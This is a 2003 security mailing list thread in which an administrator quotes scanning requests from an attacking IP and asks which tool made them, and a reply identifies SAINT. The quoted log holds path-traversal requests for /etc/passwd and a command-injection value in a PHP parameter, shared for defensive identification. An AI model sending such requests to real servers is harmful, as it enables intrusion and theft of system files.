Security Incidents mailing list archives

AW: Chinese source: some web attack tool

From: "Tobias Lachmann" <tobias () lachmann org>
Date: Sat, 22 Mar 2003 22:11:36 +0100

The tool in question was SAINT, the successor of SATAN.. which you can
find at  http://www.wwdsi.com/saint/ .

-----Ursprüngliche Nachricht-----
Von: Paul [mailto:pbobby () stny rr com] 
Gesendet: Freitag, 21. März 2003 23:15
An: incidents () securityfocus com
Betreff: Chinese source: some web attack tool




Getting hammered by a Chinese site, 218.88.98.237.

Anyone else?

They are web attacks, and here is a sample of the various attempts it 
tries to make:

GET 
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../et
c/passwd%
00 HTTP/1.0
GET /IISSamples/ExAir/search/query.asp HTTP/1.0 
GET /cgi-bin/sh HTTP/1.0 
GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 
GET /search.dll?search?query=%00&logic=AND HTTP/1.0 
GET 
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd 
HTTP/1.0 

and so forth. Anyone recognize the tool?

--------------------------------------------------------------
--------------

<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure";> 
http://www.securityfocus.com/stillsecure </A>



----------------------------------------------------------------------------

<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure";> http://www.securityfocus.com/stillsecure </A>

Current thread:

Chinese source: some web attack tool Paul (Mar 22)
- AW: Chinese source: some web attack tool Tobias Lachmann (Mar 23)